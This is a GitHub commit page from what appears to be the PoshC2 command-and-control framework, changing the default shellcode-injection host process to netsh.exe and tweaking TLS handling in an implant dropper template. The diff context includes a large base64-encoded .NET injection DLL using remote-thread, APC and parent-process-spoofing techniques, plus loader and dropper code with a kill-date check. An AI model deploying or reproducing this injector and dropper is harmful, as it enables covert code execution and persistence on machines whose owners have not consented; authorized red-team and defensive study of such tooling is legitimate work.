Skip to content

Commit

Permalink
reset PS shellcode default back to netsh.exe
Browse files Browse the repository at this point in the history
  • Loading branch information
benpturner committed Apr 15, 2024
1 parent 2dc6e04 commit 64eb557
Show file tree
Hide file tree
Showing 3 changed files with 9 additions and 5 deletions.
2 changes: 1 addition & 1 deletion poshc2/client/command_handlers/PSHandler.py
Original file line number Diff line number Diff line change
Expand Up @@ -666,7 +666,7 @@ def do_migrate(user, command, implant_id):
Examples:
migrate
migrate -procid 4444
migrate -procpath c:\\windows\\system32\\searchprotocolhost.exe -suspended -RtlCreateUserThread
migrate -procpath c:\\windows\\system32\\netsh.exe -suspended -RtlCreateUserThread
migrate -procpath c:\\windows\\system32\\svchost.exe -suspended
"""
params = re.compile("migrate", re.IGNORECASE)
Expand Down
6 changes: 3 additions & 3 deletions resources/modules/Inject-Shellcode.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -62,7 +62,7 @@ if($ProcName){
if($ProcPath){
$ProcessPath = $ProcPath
} else {
$ProcessPath = "C:\Windows\system32\searchprotocolhost.exe"
$ProcessPath = "C:\Windows\system32\netsh.exe"
}
$p = "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agBjAXMAagCDAXMAagCjAXMAagADAM4AGQDOACkAzgAzAM4AfQDOABoAWwBeAAEGAQAjBg4GAAEDAAwIAQBAAQUAhwMBAEABBwAJCQEAQAEJAOsIAQBAAQsACwMBAAABEQBuAAEAAAETAGsJAQAAARUAXAkBAAABFwCbAgEAAAEZAJEJAQAAARsAgwkBAAABHQAjCAEAAAEfAC8IAQAAASEACwMBAAABIwC2AgEAAAElAIACAQAAAScAjgIBAAYBKQD7AgEAQwErAEEIAgAAAi0AfAkDAAABLwDBAgQAQAExAAwIAQAEgAAAAQAAAAAAAAAAAAAAAACICAAAAgAAAAAAAAAAAAAAYQApAgAAAAACAAAAAAAAAAAAAABhADMGAAAAAAcABQAIAAUACQAFAAoABQALAAYADAAGAA0ABgAAAAAAAGtlcm5lbDMyAFRIUkVBRF9TRVRfQ09OVEVYVDIAY2JSZXNlcnZlZDIAbHBSZXNlcnZlZDIAVEhSRUFEX1NFVF9DT05URVhUMwBUSFJFQURfU0VUX0NPTlRFWFQ0ADxNb2R1bGU+AHBmbkFQQwBRdWV1ZVVzZXJBUEMARVhFQ1VURV9SRUFEAFNVU1BFTkRfUkVTVU1FAFRFUk1JTkFURQBJTVBFUlNPTkFURQBQQUdFX1JFQURXUklURQBFWEVDVVRFX1JFQURXUklURQBFWEVDVVRFAE1FTV9SRVNFUlZFAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFNFVF9USFJFQURfVE9LRU4AUFJPQ0VTU19JTkZPUk1BVElPTgBTRVRfSU5GT1JNQVRJT04AUVVFUllfSU5GT1JNQVRJT04ARElSRUNUX0lNUEVSU09OQVRJT04AVE9QX0RPV04AU1RBUlRVUElORk8ATEFSR0VfUEFHRVMAU0VDVVJJVFlfQVRUUklCVVRFUwBOT0FDQ0VTUwBUSFJFQURfQUxMX0FDQ0VTUwBQUk9DRVNTX0FMTF9BQ0NFU1MAUkVTRVQATUVNX0NPTU1JVABHRVRfQ09OVEVYVABUSFJFQURfU0VUX0NPTlRFWFQAU1RBUlRVUElORk9FWABkd1gAUkVBRE9OTFkARVhFQ1VURV9XUklURUNPUFkAZHdZAHZhbHVlX18AZHdEYXRhAGNiAG1zY29ybGliAHNyYwBscFRocmVhZElkAGR3VGhyZWFkSWQAcGFyZW50UHJvY2Vzc0lkAGR3UHJvY2Vzc0lkAENsaWVudElkAEdldFByb2Nlc3NCeUlkAFN1c3BlbmRUaHJlYWQAUmVzdW1lVGhyZWFkAENyZWF0ZVJlbW90ZVRocmVhZABoVGhyZWFkAE9wZW5UaHJlYWQAUnRsQ3JlYXRlVXNlclRocmVhZABDcmVhdGVTdXNwZW5kZWQAbHBSZXNlcnZlZABnZXRfSGFuZGxlAEdldE1vZHVsZUhhbmRsZQBDbG9zZUhhbmRsZQBiSW5oZXJpdEhhbmRsZQBscFRpdGxlAGhNb2R1bGUAcHJvY05hbWUAbHBNb2R1bGVOYW1lAGxwQXBwbGljYXRpb25OYW1lAGxwQ29tbWFuZExpbmUAVmFsdWVUeXBlAGZsQWxsb2NhdGlvblR5cGUAVXBkYXRlUHJvY1RocmVhZEF0dHJpYnV0ZQBHdWlkQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBscFZhbHVlAGxwUHJldmlvdXNWYWx1ZQBkd1hTaXplAGR3WVNpemUAZ2V0X1NpemUAY2JTaXplAENvbW1pdHRlZFN0YWNrU2l6ZQBNYXhpbXVtU3RhY2tTaXplAGR3U3RhY2tTaXplAGxwUmV0dXJuU2l6ZQBscFNpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2RpZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBuTGVuZ3RoAEFsbG9jSEdsb2JhbABGcmVlSEdsb2JhbABNYXJzaGFsAGtlcm5lbDMyLmRsbABudGRsbC5kbGwASW5qZWN0LmRsbABtc3ZjcnQuZGxsAEZpbGwAU3lzdGVtAEVudW0AbHBOdW1iZXJPZkJ5dGVzV3JpdHRlbgBscFByb2Nlc3NJbmZvcm1hdGlvbgBwRGVzdGluYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVjdGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGxwQnVmZmVyAFBQSURTcG9vZmVyAGxwUGFyYW1ldGVyAGhTdGRFcnJvcgAuY3RvcgBUaHJlYWRTZWN1cml0eURlc2NyaXB0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IAV3JpdGVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0uUnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAGJJbmhlcml0SGFuZGxlcwBscFRocmVhZEF0dHJpYnV0ZXMAbHBQcm9jZXNzQXR0cmlidXRlcwBkd0NyZWF0aW9uRmxhZ3MAZHdGbGFncwBkd1hDb3VudENoYXJzAGR3WUNvdW50Q2hhcnMAVGhyZWFkQWNjZXNzAGR3RGVzaXJlZEFjY2VzcwBDcmVhdGVQcm9jZXNzAGhQcm9jZXNzAE9wZW5Qcm9jZXNzAEdldEN1cnJlbnRQcm9jZXNzAEdldFByb2NBZGRyZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3RhcnRBZGRyZXNzAFplcm9CaXRzAGhPYmplY3QASW5qZWN0AGxwZmxPbGRQcm90ZWN0AGZsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAbHBFbnZpcm9ubWVudABkd0F0dHJpYnV0ZUNvdW50AGNvdW50AGRlc3QARGVsZXRlUHJvY1RocmVhZEF0dHJpYnV0ZUxpc3QASW5pdGlhbGl6ZVByb2NUaHJlYWRBdHRyaWJ1dGVMaXN0AGxwQXR0cmlidXRlTGlzdABoU3RkSW5wdXQAaFN0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"
$dl = [System.Convert]::FromBase64String($p)
Expand All @@ -75,9 +75,9 @@ echo ""

if ($x86.IsPresent -and (!$procpath)) {
if ($env:PROCESSOR_ARCHITECTURE -eq "x86"){
$ProcessPath = "C:\Windows\System32\searchprotocolhost.exe"
$ProcessPath = "C:\Windows\System32\netsh.exe"
} else {
$ProcessPath = "C:\Windows\Syswow64\searchprotocolhost.exe"
$ProcessPath = "C:\Windows\Syswow64\netsh.exe"
}
}

Expand Down
6 changes: 5 additions & 1 deletion resources/payload-templates/dropper.ps1
Original file line number Diff line number Diff line change
Expand Up @@ -49,7 +49,11 @@ function Decrypt-String ($key,$enc){
}

function Get-Webclient ($Cookie) {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]192 -bor [Net.SecurityProtocolType]768 -bor [Net.SecurityProtocolType]3072;
try {
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls -bor [Net.SecurityProtocolType]::Tls11 -bor [Net.SecurityProtocolType]::Tls12;
} catch {
echo "An error occurred: $_"
}
$d = (Get-Date -Format "yyyy-MM-dd");
$d = [datetime]::ParseExact($d,"yyyy-MM-dd",$null);
$k = [datetime]::ParseExact("#REPLACEKILLDATE#","yyyy-MM-dd",$null);
Expand Down

0 comments on commit 64eb557

Please sign in to comment.